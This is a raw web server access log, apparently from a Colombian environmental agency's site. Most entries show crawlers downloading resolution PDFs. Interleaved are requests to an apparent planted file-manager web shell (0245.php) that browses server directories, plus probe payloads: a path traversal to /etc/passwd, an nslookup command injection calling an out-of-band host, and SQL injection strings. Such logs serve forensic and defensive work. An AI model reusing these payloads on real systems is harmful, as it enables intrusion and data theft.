52.70.240.171 - - [25/Apr/2024:04:58:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0813.pdf HTTP/1.1" 200 232305
3.224.220.101 - - [25/Apr/2024:04:58:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1680.pdf HTTP/1.1" 200 283653
52.70.240.171 - - [25/Apr/2024:04:58:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0812.pdf HTTP/1.1" 200 316295
3.224.220.101 - - [25/Apr/2024:04:58:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1679.pdf HTTP/1.1" 200 282415
181.59.244.61 - - [25/Apr/2024:04:58:56 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 5541611
23.22.35.162 - - [25/Apr/2024:04:58:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0799.pdf HTTP/1.1" 200 270591
52.70.240.171 - - [25/Apr/2024:04:59:05 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1676.pdf HTTP/1.1" 200 283826
47.128.119.188 - - [25/Apr/2024:04:59:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page35_thumbnail.jpg HTTP/1.1" 200 16211
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.119.188 - - [25/Apr/2024:04:59:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
23.22.35.162 - - [25/Apr/2024:04:59:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0783.pdf HTTP/1.1" 200 816336
3.224.220.101 - - [25/Apr/2024:04:59:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1675.pdf HTTP/1.1" 200 282561
52.70.240.171 - - [25/Apr/2024:04:59:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0777.pdf HTTP/1.1" 200 322157
23.22.35.162 - - [25/Apr/2024:04:59:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1674.pdf HTTP/1.1" 200 283372
3.224.220.101 - - [25/Apr/2024:04:59:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0776.pdf HTTP/1.1" 200 374544
47.128.39.71 - - [25/Apr/2024:04:59:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cxampp%5Cxampp%5Chtdocs%5Cphpscripts%5C&f=ibocalive4II.php HTTP/1.1" 200 11725
3.224.220.101 - - [25/Apr/2024:04:59:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/01674.pdf HTTP/1.1" 200 283372
47.128.119.193 - - [25/Apr/2024:04:59:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page43_thumbnail.jpg&imgsize=20 HTTP/1.1" 200 16211
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.119.193 - - [25/Apr/2024:04:59:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.119.193 - - [25/Apr/2024:04:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.119.193 - - [25/Apr/2024:04:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.119.193 - - [25/Apr/2024:04:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.119.193 - - [25/Apr/2024:04:59:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
103.123.8.135 - - [25/Apr/2024:04:59:30 -0500] "GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1" 404 1035
23.22.35.162 - - [25/Apr/2024:04:59:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0775.pdf HTTP/1.1" 200 331205
3.224.220.101 - - [25/Apr/2024:04:59:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1673.pdf HTTP/1.1" 200 283561
52.70.240.171 - - [25/Apr/2024:04:59:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0770.pdf HTTP/1.1" 200 330548
3.224.220.101 - - [25/Apr/2024:04:59:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1671.pdf HTTP/1.1" 200 292526
23.22.35.162 - - [25/Apr/2024:04:59:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0767.pdf HTTP/1.1" 200 1641731
23.22.35.162 - - [25/Apr/2024:04:59:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0763.pdf HTTP/1.1" 200 378707
47.128.117.252 - - [25/Apr/2024:04:59:52 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages%5C&f=page20_thumbnail.jpg&imgsize=20 HTTP/1.1" 200 16155
47.128.117.252 - - [25/Apr/2024:04:59:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.117.252 - - [25/Apr/2024:04:59:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.117.252 - - [25/Apr/2024:04:59:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.117.252 - - [25/Apr/2024:04:59:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.117.252 - - [25/Apr/2024:04:59:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [25/Apr/2024:04:59:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1670.pdf HTTP/1.1" 200 282129
52.70.240.171 - - [25/Apr/2024:04:59:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0758.pdf HTTP/1.1" 200 369428
172.22.2.4 - - [25/Apr/2024:04:58:23 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.70.240.171 - - [25/Apr/2024:05:00:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0755.pdf HTTP/1.1" 200 297466
3.92.82.172 - - [25/Apr/2024:05:00:07 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera3P.jpg HTTP/1.1" 200 31355
3.224.220.101 - - [25/Apr/2024:05:00:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0754.pdf HTTP/1.1" 200 315204
3.224.220.101 - - [25/Apr/2024:05:00:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0748.pdf HTTP/1.1" 200 403120
52.70.240.171 - - [25/Apr/2024:05:00:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1669.pdf HTTP/1.1" 200 281051
47.128.63.113 - - [25/Apr/2024:05:00:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages%5C&f=page91_thumbnail.jpg&imgsize=50 HTTP/1.1" 200 16437
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.63.113 - - [25/Apr/2024:05:00:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [25/Apr/2024:05:00:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0746.pdf HTTP/1.1" 200 369899
3.224.220.101 - - [25/Apr/2024:05:00:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1668.pdf HTTP/1.1" 200 291312
52.70.240.171 - - [25/Apr/2024:05:00:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0744.pdf HTTP/1.1" 200 1937313
23.22.35.162 - - [25/Apr/2024:05:00:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1665.pdf HTTP/1.1" 200 282809
52.70.240.171 - - [25/Apr/2024:05:00:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0743.pdf HTTP/1.1" 200 358755
3.224.220.101 - - [25/Apr/2024:05:00:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0739.pdf HTTP/1.1" 200 270907
47.128.34.86 - - [25/Apr/2024:05:00:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbreclima%5Cwp-includes%5CID3%5C&f=license.commercial.txt&fullhexdump=1 HTTP/1.1" 200 3597
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.34.86 - - [25/Apr/2024:05:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
201.245.192.253 - - [25/Apr/2024:05:00:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41163
52.70.240.171 - - [25/Apr/2024:05:00:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1664.pdf HTTP/1.1" 200 281997
3.224.220.101 - - [25/Apr/2024:05:00:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0737.pdf HTTP/1.1" 200 357749
3.224.220.101 - - [25/Apr/2024:05:00:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1663.pdf HTTP/1.1" 200 283665
172.22.2.4 - - [25/Apr/2024:04:59:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
52.70.240.171 - - [25/Apr/2024:05:00:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0723.pdf HTTP/1.1" 200 321879
3.224.220.101 - - [25/Apr/2024:05:00:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1661.pdf HTTP/1.1" 200 343840
23.22.35.162 - - [25/Apr/2024:05:01:03 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0715.pdf HTTP/1.1" 200 567398
47.128.29.204 - - [25/Apr/2024:05:01:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&base64=2&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page102_thumbnail.jpg HTTP/1.1" 200 16240
47.128.29.204 - - [25/Apr/2024:05:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.29.204 - - [25/Apr/2024:05:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.29.204 - - [25/Apr/2024:05:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.29.204 - - [25/Apr/2024:05:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.29.204 - - [25/Apr/2024:05:01:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.29.204 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.29.204 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.29.204 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.29.204 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.29.204 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:05:01:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1656.pdf HTTP/1.1" 200 889681
3.224.220.101 - - [25/Apr/2024:05:01:11 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0711.pdf HTTP/1.1" 200 431958
52.167.144.221 - - [25/Apr/2024:05:01:15 -0500] "GET /Publicaciones/2024EE58073.pdf HTTP/1.1" 404 227
3.224.220.101 - - [25/Apr/2024:05:01:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1655.pdf HTTP/1.1" 200 292498
52.70.240.171 - - [25/Apr/2024:05:01:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0708.pdf HTTP/1.1" 200 1324389
3.224.220.101 - - [25/Apr/2024:05:01:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1654.pdf HTTP/1.1" 200 283322
52.70.240.171 - - [25/Apr/2024:05:01:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0707.pdf HTTP/1.1" 200 1336605
47.128.125.16 - - [25/Apr/2024:05:01:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages%5C&f=page36_thumbnail.jpg&fullhexdump=1 HTTP/1.1" 200 16267
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.125.16 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
3.224.220.101 - - [25/Apr/2024:05:01:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1653.pdf HTTP/1.1" 200 728800
52.70.240.171 - - [25/Apr/2024:05:01:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0699.pdf HTTP/1.1" 200 373866
52.70.240.171 - - [25/Apr/2024:05:01:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1652.pdf HTTP/1.1" 200 442145
3.224.220.101 - - [25/Apr/2024:05:01:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0695.pdf HTTP/1.1" 200 312272
23.22.35.162 - - [25/Apr/2024:05:01:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0674.pdf HTTP/1.1" 200 406883
3.224.220.101 - - [25/Apr/2024:05:01:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1651.pdf HTTP/1.1" 200 792463
47.128.34.163 - - [25/Apr/2024:05:01:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Ccounter%5Cdigits%5Cchevy%5C&f=0.png&white=1 HTTP/1.1" 200 1140
3.224.220.101 - - [25/Apr/2024:05:01:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0670.pdf HTTP/1.1" 200 360680
52.70.240.171 - - [25/Apr/2024:05:02:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1650.pdf HTTP/1.1" 200 283772
3.224.220.101 - - [25/Apr/2024:05:02:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0668.pdf HTTP/1.1" 200 300878
52.70.240.171 - - [25/Apr/2024:05:02:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/01649.pdf HTTP/1.1" 200 289144
52.70.240.171 - - [25/Apr/2024:05:02:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0666.pdf HTTP/1.1" 200 259465
23.22.35.162 - - [25/Apr/2024:05:02:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1647.pdf HTTP/1.1" 200 411056
47.128.63.24 - - [25/Apr/2024:05:02:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cvehiculos%5Cimages%5C&f=page63_thumbnail.jpg&imgsize=100 HTTP/1.1" 200 16212
47.128.63.24 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.63.24 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.63.24 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.63.24 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
52.70.240.171 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0661.pdf HTTP/1.1" 200 322768
47.128.63.24 - - [25/Apr/2024:05:02:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.63.24 - - [25/Apr/2024:05:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.63.24 - - [25/Apr/2024:05:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.63.24 - - [25/Apr/2024:05:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.63.24 - - [25/Apr/2024:05:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.63.24 - - [25/Apr/2024:05:02:20 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
23.22.35.162 - - [25/Apr/2024:05:02:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1645.pdf HTTP/1.1" 200 282517
3.224.220.101 - - [25/Apr/2024:05:02:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0660.pdf HTTP/1.1" 200 1906578
52.70.240.171 - - [25/Apr/2024:05:02:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1640.pdf HTTP/1.1" 200 290337
23.22.35.162 - - [25/Apr/2024:05:02:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0655.pdf HTTP/1.1" 200 346692
52.70.240.171 - - [25/Apr/2024:05:02:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1639.pdf HTTP/1.1" 200 291287
3.224.220.101 - - [25/Apr/2024:05:02:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0642.pdf HTTP/1.1" 200 285518
47.128.24.26 - - [25/Apr/2024:05:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.24.26 - - [25/Apr/2024:05:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_jpg HTTP/1.1" 200 175
47.128.24.26 - - [25/Apr/2024:05:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.24.26 - - [25/Apr/2024:05:02:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccurtiembres%5Cimages&f=page118_thumbnail.jpg HTTP/1.1" 200 16349
47.128.24.26 - - [25/Apr/2024:05:02:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.24.26 - - [25/Apr/2024:05:02:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
52.70.240.171 - - [25/Apr/2024:05:02:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1638.pdf HTTP/1.1" 200 290593
3.224.220.101 - - [25/Apr/2024:05:02:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0641.pdf HTTP/1.1" 200 353018
3.224.220.101 - - [25/Apr/2024:05:02:55 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0640.pdf HTTP/1.1" 200 361312
172.22.2.4 - - [25/Apr/2024:05:02:57 -0500] "GET /BLA/boletinlegal/webadmin/script?command=|%20nslookup%20cok0ph6roa830a7df2m0c6tnbsc91wczs.oast.me HTTP/1.1" 404 1038
172.22.2.4 - - [25/Apr/2024:05:02:57 -0500] "GET /BLA/boletinlegal/plus/recommend.php?action&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5(999999999),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 HTTP/1.1" 404 1038
52.70.240.171 - - [25/Apr/2024:05:02:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1634.pdf HTTP/1.1" 200 292274
216.245.221.92 - - [25/Apr/2024:05:03:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [25/Apr/2024:05:03:03 -0500] "GET /BLA/boletinlegal/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1" 404 1038
